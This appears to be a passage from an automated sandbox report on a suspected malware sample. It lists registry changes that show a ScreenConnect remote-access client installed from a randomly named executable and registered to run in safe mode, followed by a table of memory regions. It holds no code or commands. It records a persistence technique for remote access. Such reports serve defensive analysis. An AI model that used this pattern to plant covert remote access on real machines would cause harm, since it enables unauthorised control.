HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\Files
ScreenConnect.ClientService.dll_5e8c1e5c1cd8d9ee
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\Files
ScreenConnect.WindowsClient.exe_fd0fcfe1fd1a6cd2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\Files
ScreenConnect.Core.dll_963930cc5ced28c7
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\Files
ScreenConnect.Client.dll_7b0ea606092ddbcb
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\Files
ScreenConnect.Windows.dll_fa5f7fd8f7c108bb
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
SubstructureCreated
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
Blob
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Blob
\REGISTRY\A\{9968a857-d146-8027-1e0d-feef210fbf26}\Root\InventoryApplicationFile\3coxoav92n.exe|a65d7328996b89bd
ProgramId
\REGISTRY\A\{9968a857-d146-8027-1e0d-feef210fbf26}\Root\InventoryApplicationFile\3coxoav92n.exe|a65d7328996b89bd
FileId
\REGISTRY\A\{9968a857-d146-8027-1e0d-feef210fbf26}\Root\InventoryApplicationFile\3coxoav92n.exe|a65d7328996b89bd
LowerCaseLongPath
\REGISTRY\A\{9968a857-d146-8027-1e0d-feef210fbf26}\Root\InventoryApplicationFile\3coxoav92n.exe|a65d7328996b89bd
LongPathHash
\REGISTRY\A\{9968a857-d146-8027-1e0d-feef210fbf26}\Root\InventoryApplicationFile\3coxoav92n.exe|a65d7328996b89bd
Name
\REGISTRY\A\{9968a857-d146-8027-1e0d-feef210fbf26}\Root\InventoryApplicationFile\3coxoav92n.exe|a65d7328996b89bd
OriginalFileName
\REGISTRY\A\{9968a857-d146-8027-1e0d-feef210fbf26}\Root\InventoryApplicationFile\3coxoav92n.exe|a65d7328996b89bd
Publisher
\REGISTRY\A\{9968a857-d146-8027-1e0d-feef210fbf26}\Root\InventoryApplicationFile\3coxoav92n.exe|a65d7328996b89bd
Version
\REGISTRY\A\{9968a857-d146-8027-1e0d-feef210fbf26}\Root\InventoryApplicationFile\3coxoav92n.exe|a65d7328996b89bd
BinFileVersion
\REGISTRY\A\{9968a857-d146-8027-1e0d-feef210fbf26}\Root\InventoryApplicationFile\3coxoav92n.exe|a65d7328996b89bd
BinaryType
\REGISTRY\A\{9968a857-d146-8027-1e0d-feef210fbf26}\Root\InventoryApplicationFile\3coxoav92n.exe|a65d7328996b89bd
ProductName
\REGISTRY\A\{9968a857-d146-8027-1e0d-feef210fbf26}\Root\InventoryApplicationFile\3coxoav92n.exe|a65d7328996b89bd
ProductVersion
\REGISTRY\A\{9968a857-d146-8027-1e0d-feef210fbf26}\Root\InventoryApplicationFile\3coxoav92n.exe|a65d7328996b89bd
LinkDate
\REGISTRY\A\{9968a857-d146-8027-1e0d-feef210fbf26}\Root\InventoryApplicationFile\3coxoav92n.exe|a65d7328996b89bd
BinProductVersion
\REGISTRY\A\{9968a857-d146-8027-1e0d-feef210fbf26}\Root\InventoryApplicationFile\3coxoav92n.exe|a65d7328996b89bd
AppxPackageFullName
\REGISTRY\A\{9968a857-d146-8027-1e0d-feef210fbf26}\Root\InventoryApplicationFile\3coxoav92n.exe|a65d7328996b89bd
AppxPackageRelativeId
\REGISTRY\A\{9968a857-d146-8027-1e0d-feef210fbf26}\Root\InventoryApplicationFile\3coxoav92n.exe|a65d7328996b89bd
Size
\REGISTRY\A\{9968a857-d146-8027-1e0d-feef210fbf26}\Root\InventoryApplicationFile\3coxoav92n.exe|a65d7328996b89bd
Language
\REGISTRY\A\{9968a857-d146-8027-1e0d-feef210fbf26}\Root\InventoryApplicationFile\3coxoav92n.exe|a65d7328996b89bd
Usn
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\2C85006A1A028BCC349DF23C474724C055FDE8B6
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\B68D8F953E551914324E557E6164D68B9926650C
Blob
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02vnquskfpppcivc
Reason
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02bahbskipsopkqs
DeviceId
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02bahbskipsopkqs
Provision Friday, October 25, 2024 13:29:27
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02bahbskipsopkqs
AppIdList
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02gfcilbgfbgtour
Request Friday, October 25, 2024 13:29:32
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02gfcilbgfbgtour
Response Friday, October 25, 2024 13:29:32
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02gfcilbgfbgtour
Reason
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02hfxbgqzlxleami
DeviceId
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02hfxbgqzlxleami
AppIdList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02vnquskfpppcivc
AppIdList
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18
ValidDeviceId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL
GlobalDeviceUpdateTime
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02bahbskipsopkqs
DeviceId
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18
ValidDeviceId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02bahbskipsopkqs
DeviceId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_USERS.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC
Data
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003
ValidDeviceId
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02gfcilbgfbgtour
AppIdList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\AuthCookies\Live\Default\DIDC
Data
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02hfxbgqzlxleami
DeviceId
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003
ValidDeviceId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\AuthCookies\Live\Default\DIDC
Data
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02hfxbgqzlxleami
DeviceId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\AuthCookies\Live\Default\DIDC
Data
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02hfxbgqzlxleami
DeviceId
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\ExtendedProperties
LID
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f
lock!0e00000002d8690018070000cc0c00000000000000000000a0131b7f0327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c
lock!0c00000002d8690018070000cc0c00000000000000000000a0131b7f0327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea
lock!0a00000002d8690018070000cc0c00000000000000000000a0131b7f0327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
lock!0800000002d8690018070000cc0c00000000000000000000a0131b7f0327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
lock!0600000002d8690018070000cc0c00000000000000000000a0131b7f0327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
lock!0400000002d8690018070000cc0c00000000000000000000a0131b7f0327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee
lock!0200000002d8690018070000cc0c00000000000000000000a0131b7f0327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f
lock!1c00000031d8690018070000cc0c00000000000000000000703b227f0327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c
lock!1a00000031d8690018070000cc0c00000000000000000000703b227f0327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea
lock!1800000031d8690018070000cc0c00000000000000000000703b227f0327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
lock!1600000031d8690018070000cc0c00000000000000000000703b227f0327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
lock!1400000031d8690018070000cc0c00000000000000000000703b227f0327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
lock!1200000031d8690018070000cc0c00000000000000000000703b227f0327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee
lock!1000000031d8690018070000cc0c00000000000000000000703b227f0327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
lock!1d00000050d8690018070000cc0c0000000000000000000025ff267f0327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\F_scre..tion_25b0fbb6ef7eb094_98134c89f0fa827c
LastRunVersion
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gc_scre..tion_503889a8656f441d
LastRunVersion
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gi_scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
LastRunVersion
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
HasRunBefore
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\ScreenConnect Client (a7ee4b85-96fb-4d9a-b419-6636f94d66aa)
NULL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\ScreenConnect
EventMessageFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (a7ee4b85-96fb-4d9a-b419-6636f94d66aa)
ImagePath
There are 212 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
7FF848D4D000
trusted library allocation
page execute and read and write
DC87DFE000
stack
page read and write
86860FE000
unkown
page readonly
2A1101D6000
trusted library allocation
page read and write
2487BC56000
heap
page read and write
DCA000
heap
page read and write
2487B50E000
heap
page read and write
2A1737E0000
heap
page read and write
7FF848F50000
trusted library allocation
page read and write
1C680000
heap
page read and write
1BD10000
heap
page read and write
246CA902000
heap
page read and write
1782000
trusted library allocation
page read and write
7FF848F50000
trusted library allocation
page read and write
1BC50000
unkown
page readonly
569000
heap
page read and write
7FF848FC0000
trusted library allocation
page read and write
50EE000
stack
page read and write
2A171DB5000
heap
page read and write
2487AC97000
heap
page read and write
BBEC2FD000
stack
page read and write
1C696000
heap
page read and write
582E000
stack
page read and write
13CE000
stack
page read and write
11E0000
heap
page read and write
BBEC1FE000
stack
page read and write
2487B552000
heap
page read and write
11C6000
heap
page read and write
2487B556000
heap
page read and write
1B795000
heap
page read and write
1B44000
trusted library allocation
page read and write
2487B57C000
heap
page read and write
2A17579D000
heap
page read and write
560000
heap
page read and write
2487B55B000
heap
page read and write
246CA000000
heap
page read and write
7FF849070000
trusted library allocation
page read and write
AC0000
unkown
page readonly
59F000
heap
page read and write
8686EFE000
unkown
page readonly
51F0000
unkown
page readonly
2A1002BA000
trusted library allocation
page read and write
2487B530000
heap
page read and write
12B3000
heap
page read and write
13FE5A00000
heap
page read and write
8686AFE000
unkown
page readonly
7FF848D60000
trusted library allocation
page read and write
DF0000
heap
page execute and read and write
246CA2D0000
heap
page read and write
2487BCD3000
heap
page read and write
E20000
trusted library allocation
page read and write
44A0000
trusted library allocation
page read and write
11B0000
heap
page read and write
2487AD2C000
heap
page read and write
7FF848D84000
trusted library allocation
page read and write
2A175A99000
heap
page read and write
2A175AA9000
heap
page read and write
5160000
trusted library allocation
page read and write
86871FE000
unkown
page readonly
3802279000
stack
page read and write
1B1D7000
heap
page read and write
DE0000
trusted library allocation
page read and write
2D80000
heap
page execute and read and write
44EF000
trusted library allocation
page read and write
7FF8490B0000
trusted library allocation
page read and write
7FF8490D6000
trusted library allocation
page read and write
2487B52A000
heap
page read and write
2A177C9F000
heap
page read and write
7FF848D63000
trusted library allocation
page execute and read and write
1390000
heap
page read and write
2EBF000
trusted library allocation
page read and write
2487B57D000
heap
page read and write
2487B55B000
heap
page read and write
2AEE000
stack
page read and write
44B0000
trusted library allocation
page execute and read and write
2487AD2D000
heap
page read and write
2487BD29000
heap
page read and write
246CF623000
trusted library allocation
page read and write
3CA1000
trusted library allocation
page read and write
2487BD39000
heap
page read and write
2487B532000
heap
page read and write
2487AD02000
heap
page read and write
DFA000
heap
page read and write
AD3000
unkown
page readonly
7FF848D8D000
trusted library allocation
page execute and read and write
2487AC5F000
heap
page read and write
2A174030000
heap
page read and write
2487B533000
heap
page read and write
BB0000
heap
page read and write
1B7B2000
heap
page read and write
2A171E84000
heap
page read and write
2487B54D000
heap
page read and write
1976000
trusted library allocation
page read and write
7CD000
stack
page read and write
BBECEFA000
stack
page read and write
2E20000
heap
page execute and read and write
246CA91A000
heap
page read and write
531000
stack
page read and write
2A30000
trusted library allocation
page read and write
7FF848F90000
trusted library allocation
page read and write
7FF848E1C000
trusted library allocation
page execute and read and write
7FF848D8C000
trusted library allocation
page execute and read and write
2A177DAB000
heap
page read and write
7FF848D54000
trusted library allocation
page read and write
AC1000
unkown
page execute read
246CB501000
trusted library allocation
page read and write
2487BCE4000
heap
page read and write
2A171E44000
heap
page read and write
1966000
trusted library allocation
page read and write
2A171E3C000
heap
page read and write
2487AD2B000
heap
page read and write
532D000
stack
page read and write
2487B52E000
heap
page read and write
2487B53B000
heap
page read and write
2487B533000
heap
page read and write
7FF848E50000
trusted library allocation
page execute and read and write
2487B533000
heap
page read and write
2411000
trusted library allocation
page read and write
E30000
heap
page read and write
C5D000
trusted library allocation
page execute and read and write
D8D000
trusted library allocation
page execute and read and write
246CA770000
trusted library section
page read and write
2A100244000
trusted library allocation
page read and write
1390000
trusted library allocation
page read and write
7FF8490E0000
trusted library allocation
page read and write
2A177C98000
heap
page read and write
2487ACAB000
heap
page read and write
2487BCB2000
heap
page read and write
2A100628000
trusted library allocation
page read and write
8685FFE000
stack
page read and write
7FF848D33000
trusted library allocation
page execute and read and write
86E000
stack
page read and write
1180000
heap
page read and write
2487B579000
heap
page read and write
8686E7E000
stack
page read and write
7FF848EF0000
trusted library allocation
page read and write
2D6F000
stack
page read and write
2487AC3F000
heap
page read and write
2487AD2B000
heap
page read and write
12B6000
heap
page read and write
2A45000
trusted library allocation
page execute and read and write
DC0000
heap
page read and write
7FF848FE0000
trusted library allocation
page read and write
12D9E000
trusted library allocation
page read and write
246CF8F5000
heap
page read and write
7FF848E80000
trusted library allocation
page execute and read and write
7FF848E06000
trusted library allocation
page read and write
2A177D5B000
heap
page read and write
B00000
heap
page read and write
1C1F0000
heap
page execute and read and write
2A173770000
heap
page read and write
2487B52E000
heap
page read and write
2A175BE0000
heap
page read and write
7FF848EF0000
trusted library allocation
page read and write
ABE000
stack
page read and write
2A1101C4000
trusted library allocation
page read and write
DC884FC000
stack
page read and write
7FF848FD0000
trusted library allocation
page read and write
13D0000
heap
page read and write
246CF915000
heap
page read and write
2487ACC3000
heap
page read and write
2487B533000
heap
page read and write
2487BD02000
heap
page read and write
2487BCB8000
heap
page read and write
1B956000
stack
page read and write
1B52000
trusted library allocation
page read and write
AD1000
unkown
page read and write
7FF848F80000
trusted library allocation
page read and write
7FF8490F0000
trusted library allocation
page read and write
7FF848D74000
trusted library allocation
page read and write
2A1720B0000
heap
page read and write
2487BCB5000
heap
page read and write
2487B52A000
heap
page read and write
246CB0E0000
trusted library allocation
page read and write
7FF8490E0000
trusted library allocation
page read and write
2487BD36000
heap
page read and write
E01000
heap
page read and write
7FF848FA0000
trusted library allocation
page read and write
2A171E46000
heap
page read and write
7FF848FD0000
trusted library allocation
page read and write
2487BD06000
heap
page read and write
2A177D9B000
heap
page read and write
2E30000
unkown
page readonly
246CF6F0000
trusted library allocation
page read and write
7FF848F25000
trusted library allocation
page read and write
DC879F9000
stack
page read and write
2A173850000
heap
page execute and read and write
2A175A9C000
heap
page read and write
7FF848DE6000
trusted library allocation
page read and write
C53000
trusted library allocation
page execute and read and write
246CF5F4000
trusted library allocation
page read and write
2487B55B000
heap
page read and write
246CA95A000
heap
page read and write
2487B533000
heap
page read and write
2A10051A000
trusted library allocation
page read and write
2487ACF7000
heap
page read and write
1B81E000
stack
page read and write
2A174688000
heap
page read and write
1140000
heap
page read and write
246CF8F3000
heap
page read and write
2CA1000
trusted library allocation
page read and write
DC87AFE000
unkown
page readonly
438E000
stack
page read and write
246CF700000
trusted library allocation
page read and write
11AE000
stack
page read and write
7FF848F90000
trusted library allocation
page read and write
2A175BEE000
heap
page read and write
C20000
trusted library section
page read and write
149E000
stack
page read and write
13FE5B02000
heap
page read and write
4500000
trusted library allocation
page execute and read and write
2487B510000
heap
page read and write
2487BD3C000
heap
page read and write
BD0000
heap
page read and write
319E000
stack
page read and write
5370000
heap
page read and write
1B853000
heap
page read and write
2487B535000
heap
page read and write
17C0000
heap
page read and write
2487B507000
heap
page read and write
4520000
heap
page read and write
2A32000
trusted library allocation
page read and write
13FE5B13000
heap
page read and write
2A10000
trusted library allocation
page read and write
7FF848D4A000
trusted library allocation
page read and write
BBEBFFE000
stack
page read and write
DC873FE000
unkown
page readonly
1BBA4000
heap
page read and write
1B6F0000
heap
page execute and read and write
E39000
heap
page read and write
2487B53B000
heap
page read and write
2A100268000
trusted library allocation
page read and write
2487ACBB000
heap
page read and write
5A3000
heap
page read and write
117F000
heap
page read and write
46CE000
stack
page read and write
7FF848F20000
trusted library allocation
page read and write
246CA0A1000
heap
page read and write
FBE000
stack
page read and write
246CF750000
remote allocation
page read and write
246CA09B000
heap
page read and write
DC874FE000
unkown
page readonly
7FF849030000
trusted library allocation
page read and write
1B7CB000
heap
page read and write
12C0000
heap
page read and write
2A177D92000
heap
page read and write
2487B56B000
heap
page read and write
1B0EE000
stack
page read and write
2487BD55000
heap
page read and write
2A10084A000
trusted library allocation
page read and write
7FF848D64000
trusted library allocation
page read and write
2A175ADC000
heap
page read and write
1130000
heap
page read and write
2487B402000
heap
page read and write
2487BCE0000
heap
page read and write
8686FFC000
stack
page read and write
139B000
trusted library allocation
page read and write
7FF848D63000
trusted library allocation
page read and write
2A174645000
heap
page read and write
2F21000
trusted library allocation
page read and write
13FE5B02000
heap
page read and write
890000
heap
page read and write
2487B500000
heap
page read and write
12DA0000
trusted library allocation
page read and write
1241E000
trusted library allocation
page read and write
2487B540000
heap
page read and write
246CF6E0000
trusted library allocation
page read and write
246CA0AB000
heap
page read and write
1B1C3000
heap
page read and write
246CA08B000
heap
page read and write
2A171DF0000
trusted library allocation
page read and write
7FF848EEF000
trusted library allocation
page read and write
DAB000
trusted library allocation
page execute and read and write
EEB000
heap
page read and write
2487B530000
heap
page read and write
246CF750000
remote allocation
page read and write
1BE92000
unkown
page readonly
2A42000
trusted library allocation
page read and write
2A1005A4000
trusted library allocation
page read and write
3D00000
trusted library allocation
page read and write
BBEC0FA000
stack
page read and write
7FF848E46000
trusted library allocation
page execute and read and write
12B0000
heap
page read and write
2487AD02000
heap
page read and write
246CA800000
heap
page read and write
7FF849170000
trusted library allocation
page read and write
2487BCC2000
heap
page read and write
2D91000
trusted library allocation
page read and write
246CF8BB000
heap
page read and write
246C9FD0000
heap
page read and write
10D0000
heap
page read and write
7FF848D60000
trusted library allocation
page read and write
7FF848F70000
trusted library allocation
page read and write
2EA0000
heap
page read and write
3EA0000
trusted library allocation
page read and write
DC87BFE000
stack
page read and write
2487B510000
heap
page read and write
7FF848F80000
trusted library allocation
page read and write
2A110001000
trusted library allocation
page read and write
5130000
trusted library allocation
page read and write
DC878FE000
unkown
page readonly
7FF848D84000
trusted library allocation
page read and write
1560000
heap
page read and write
2487BD3C000
heap
page read and write
7FF848D70000
trusted library allocation
page read and write
2A175750000
heap
page read and write
1BA1F000
stack
page read and write
2A171EFE000
heap
page read and write
2A175A5E000
heap
page read and write
2487B52A000
heap
page read and write
2487BD02000
heap
page read and write
1B66000
trusted library allocation
page read and write
7FF848FC0000
trusted library allocation
page read and write
2487B50E000
heap
page read and write
DD0000
trusted library allocation
page execute and read and write
2D4F000
trusted library allocation
page read and write
2BEE000
stack
page read and write
DA2000
trusted library allocation
page read and write
3117000
trusted library allocation
page read and write
4DAA000
stack
page read and write
7FF848F90000
trusted library allocation
page read and write
C10000
unkown
page readonly
7FF848FD0000
trusted library allocation
page read and write
ACB000
unkown
page readonly
2487BCC0000
heap
page read and write
3801A9D000
stack
page read and write
1564000
heap
page read and write
7FF848F60000
trusted library allocation
page read and write
7FF848FC9000
trusted library allocation
page read and write
44E0000
trusted library allocation
page read and write
50AC000
stack
page read and write
1BC4D000
stack
page read and write
1181000
heap
page read and write
5340000
trusted library allocation
page read and write
7FF848FC1000
trusted library allocation
page read and write
2487B52E000
heap
page read and write
7FF848EE3000
trusted library allocation
page read and write
1B9B0000
heap
page read and write
7FF848F64000
trusted library allocation
page read and write
2A20000
trusted library allocation
page read and write
246CAFB0000
trusted library section
page readonly
2A1003C1000
trusted library allocation
page read and write
2A175C12000
heap
page read and write
2487B510000
heap
page read and write
2487BCFD000
heap
page read and write
2A36000
trusted library allocation
page execute and read and write
177E000
stack
page read and write
246CA91A000
heap
page read and write
7FF848E16000
trusted library allocation
page read and write
1206000
heap
page read and write
86877F9000
stack
page read and write
2487ACF7000
heap
page read and write
1B91E000
stack
page read and write
13A0000
heap
page read and write
D7E000
stack
page read and write
86874FE000
unkown
page readonly
2487BCFF000
heap
page read and write
DF7000
heap
page read and write
7FF848D54000
trusted library allocation
page read and write
2487B57D000
heap
page read and write
246CF700000
trusted library allocation
page read and write
2A173860000
trusted library allocation
page read and write
1AE70000
trusted library allocation
page read and write
12EBD000
trusted library allocation
page read and write
9EC000
stack
page read and write
7FF8490A0000
trusted library allocation
page read and write
7FF8490D2000
trusted library allocation
page read and write
7FF848F05000
trusted library allocation
page read and write
246CA760000
trusted library allocation
page read and write
2A4B000
trusted library allocation
page execute and read and write
86867FB000
stack
page read and write
D78000
stack
page read and write
2487ACEF000
heap
page read and write
3F90000
trusted library allocation
page read and write
AC0000
unkown
page readonly
2A10073A000
trusted library allocation
page read and write
7FF848F13000
trusted library allocation
page read and write
197A000
trusted library allocation
page read and write
C6D000
unkown
page readonly
246CAE40000
trusted library allocation
page read and write
C12000
unkown
page readonly
2487BCDE000
heap
page read and write
118D000
heap
page read and write
7FF849180000
trusted library allocation
page execute and read and write
DC880FE000
unkown
page readonly
246CAFF0000
trusted library section
page readonly
592A000
stack
page read and write
1B4C000
trusted library allocation
page read and write
7FF848E1C000
trusted library allocation
page execute and read and write
2487B581000
heap
page read and write
2A1740E5000
heap
page read and write
1786000
trusted library allocation
page read and write
1370000
trusted library allocation
page read and write
2487B530000
heap
page read and write
2487B557000
heap
page read and write
750000
heap
page read and write
2A10001A000
trusted library allocation
page read and write
